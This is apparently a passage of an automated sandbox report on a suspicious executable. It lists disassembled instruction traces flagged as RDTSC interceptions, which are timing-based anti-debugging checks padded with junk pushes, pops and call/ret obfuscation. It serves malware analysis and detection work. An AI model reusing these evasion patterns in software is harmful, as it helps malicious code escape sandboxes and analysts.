    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C902C second address: 10C9043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F30F50FDE4Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F30F50FDE26h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C9B82 second address: 10C9B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CA6FA second address: 10CA7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F30F50FDE39h 0x0000000d jmp 00007F30F50FDE33h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F30F50FDE28h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d pushad 0x0000002e xor edx, 51B6D756h 0x00000034 mov edx, edi 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F30F50FDE28h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+124599D6h] 0x00000059 mov dword ptr [ebp+122D31BEh], ecx 0x0000005f push 00000000h 0x00000061 mov dword ptr [ebp+1244F2B6h], ecx 0x00000067 xchg eax, ebx 0x00000068 jmp 00007F30F50FDE39h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jns 00007F30F50FDE2Ch 0x00000076 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CA7A3 second address: 10CA7A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB1B9 second address: 10CB224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F30F50FDE26h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F30F50FDE28h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 sub si, E065h 0x0000002e mov di, CACEh 0x00000032 mov esi, edi 0x00000034 push 00000000h 0x00000036 mov si, bx 0x00000039 push 00000000h 0x0000003b xchg eax, ebx 0x0000003c jmp 00007F30F50FDE39h 0x00000041 push eax 0x00000042 jl 00007F30F50FDE38h 0x00000048 push eax 0x00000049 push edx 0x0000004a jp 00007F30F50FDE26h 0x00000050 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB224 second address: 10CB228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CBB0F second address: 10CBB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CBB14 second address: 10CBB34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F30F4CF3436h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F30F4CF343Bh 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CBB34 second address: 10CBB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F30F50FDE26h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CBB3E second address: 10CBBB8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F30F4CF3438h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 jc 00007F30F4CF3447h 0x00000029 jmp 00007F30F4CF3441h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F30F4CF3438h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, 24E3030Ah 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 jns 00007F30F4CF343Bh 0x00000058 pop edi 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ecx 0x00000060 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB8FC second address: 10CB900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB900 second address: 10CB904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB904 second address: 10CB90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB90A second address: 10CB910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB910 second address: 10CB914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB914 second address: 10CB918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CC514 second address: 10CC573 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007F30F50FDE26h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jo 00007F30F50FDE2Ch 0x00000014 jns 00007F30F50FDE26h 0x0000001a pop eax 0x0000001b nop 0x0000001c jbe 00007F30F50FDE2Bh 0x00000022 mov esi, 6EBC6B72h 0x00000027 push 00000000h 0x00000029 js 00007F30F50FDE2Eh 0x0000002f jbe 00007F30F50FDE28h 0x00000035 push ebx 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F30F50FDE28h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 xor di, 6620h 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a push ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CC573 second address: 10CC57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CF568 second address: 10CF56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CC2EE second address: 10CC2F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CF746 second address: 10CF74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CF74A second address: 10CF7EE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F30F4CF3440h 0x00000010 nop 0x00000011 jl 00007F30F4CF343Ah 0x00000017 pushad 0x00000018 mov ebx, edx 0x0000001a popad 0x0000001b mov ebx, dword ptr [ebp+122D3C2Ch] 0x00000021 push dword ptr fs:[00000000h] 0x00000028 jmp 00007F30F4CF3444h 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F30F4CF3438h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e jmp 00007F30F4CF343Dh 0x00000053 mov eax, dword ptr [ebp+122D0241h] 0x00000059 mov dword ptr [ebp+1244E950h], edi 0x0000005f push FFFFFFFFh 0x00000061 jmp 00007F30F4CF343Eh 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 jnc 00007F30F4CF343Ch 0x0000006f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D158D second address: 10D1591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D1591 second address: 10D1597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D1597 second address: 10D159C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D159C second address: 10D15E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx ebx, si 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F30F4CF3438h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D37B0h], esi 0x00000031 push 00000000h 0x00000033 or ebx, dword ptr [ebp+122D2EBCh] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F30F4CF343Dh 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D57D0 second address: 10D57D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D488F second address: 10D4893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D57D4 second address: 10D5841 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b add dword ptr [ebp+1244EA5Ch], ebx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F30F50FDE28h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d xor edi, dword ptr [ebp+122D2C60h] 0x00000033 push 00000000h 0x00000035 mov bl, 41h 0x00000037 xchg eax, esi 0x00000038 jmp 00007F30F50FDE2Bh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jno 00007F30F50FDE2Ch 0x00000046 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8ABE second address: 10D8AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8AC3 second address: 10D8AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8AC9 second address: 10D8ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8ACD second address: 10D8AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8AD1 second address: 10D8B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F30F4CF3438h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jc 00007F30F4CF343Ch 0x00000029 mov dword ptr [ebp+1244F306h], ecx 0x0000002f push 00000000h 0x00000031 mov edi, dword ptr [ebp+122D2F74h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F30F4CF3438h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 or ebx, dword ptr [ebp+122D367Ch] 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D5941 second address: 10D59A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F30F50FDE2Ch 0x0000000c je 00007F30F50FDE26h 0x00000012 popad 0x00000013 push eax 0x00000014 push ebx 0x00000015 push edi 0x00000016 jmp 00007F30F50FDE33h 0x0000001b pop edi 0x0000001c pop ebx 0x0000001d nop 0x0000001e mov ebx, eax 0x00000020 push dword ptr fs:[00000000h] 0x00000027 mov dword ptr [ebp+1245FFB2h], esi 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 mov ebx, dword ptr [ebp+122D319Ah] 0x0000003a mov eax, dword ptr [ebp+122D1151h] 0x00000040 mov dword ptr [ebp+122D1E21h], eax 0x00000046 push FFFFFFFFh 0x00000048 or dword ptr [ebp+1244DCA3h], ebx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 pushad 0x00000053 popad 0x00000054 pop eax 0x00000055 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8C7E second address: 10D8C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F4CF3441h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8C93 second address: 10D8CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8CAB second address: 10D8CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DABED second address: 10DABFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DC9B8 second address: 10DC9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DC9C3 second address: 10DCA31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F30F50FDE33h 0x0000000e jg 00007F30F50FDE2Ch 0x00000014 popad 0x00000015 nop 0x00000016 mov bx, 2923h 0x0000001a sub ebx, dword ptr [ebp+122D3332h] 0x00000020 push 00000000h 0x00000022 pushad 0x00000023 adc ecx, 09CBDC9Fh 0x00000029 mov esi, dword ptr [ebp+12454D83h] 0x0000002f popad 0x00000030 push 00000000h 0x00000032 xchg eax, esi 0x00000033 jmp 00007F30F50FDE31h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F30F50FDE33h 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DBC4D second address: 10DBCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jc 00007F30F4CF343Ah 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F30F4CF3438h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c sbb ebx, 6F8426A6h 0x00000032 push dword ptr fs:[00000000h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov edi, dword ptr [ebp+122D2D28h] 0x00000046 mov eax, dword ptr [ebp+122D101Dh] 0x0000004c jmp 00007F30F4CF3440h 0x00000051 push FFFFFFFFh 0x00000053 mov edi, dword ptr [ebp+122D2C58h] 0x00000059 add dword ptr [ebp+1245BB67h], ecx 0x0000005f nop 0x00000060 push ecx 0x00000061 jc 00007F30F4CF3438h 0x00000067 push edx 0x00000068 pop edx 0x00000069 pop ecx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jbe 00007F30F4CF343Ch 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DBCD2 second address: 10DBCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DBCD6 second address: 10DBCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F30F4CF3436h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DD9EF second address: 10DD9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DCBCA second address: 10DCBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DDC45 second address: 10DDC4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DEB8F second address: 10DEB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DEB93 second address: 10DEC11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F30F50FDE28h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D2C6Ch] 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov edi, 0F791600h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f sub dword ptr [ebp+122D3900h], edx 0x00000045 mov eax, dword ptr [ebp+122D036Dh] 0x0000004b sub dword ptr [ebp+122D2021h], ecx 0x00000051 push FFFFFFFFh 0x00000053 or dword ptr [ebp+122D35D9h], ebx 0x00000059 nop 0x0000005a push eax 0x0000005b push edx 0x0000005c ja 00007F30F50FDE2Ch 0x00000062 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DEC11 second address: 10DEC35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F30F4CF3446h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DEC35 second address: 10DEC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1082440 second address: 1082444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1082444 second address: 108247E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F30F50FDE34h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007F30F50FDE32h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F30F50FDE2Bh 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10E3722 second address: 10E3728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10E3728 second address: 10E3744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE38h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10E3744 second address: 10E3756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F30F4CF3436h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10E4987 second address: 10E498F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10890E8 second address: 10890F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEB6A second address: 10EEB6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEB6F second address: 10EEB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F4CF3443h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F30F4CF3438h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEB94 second address: 10EEBB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F30F50FDE2Dh 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEBB7 second address: 10EEBBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143DB1 second address: 1143DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143DB5 second address: 1143DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F4CF343Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
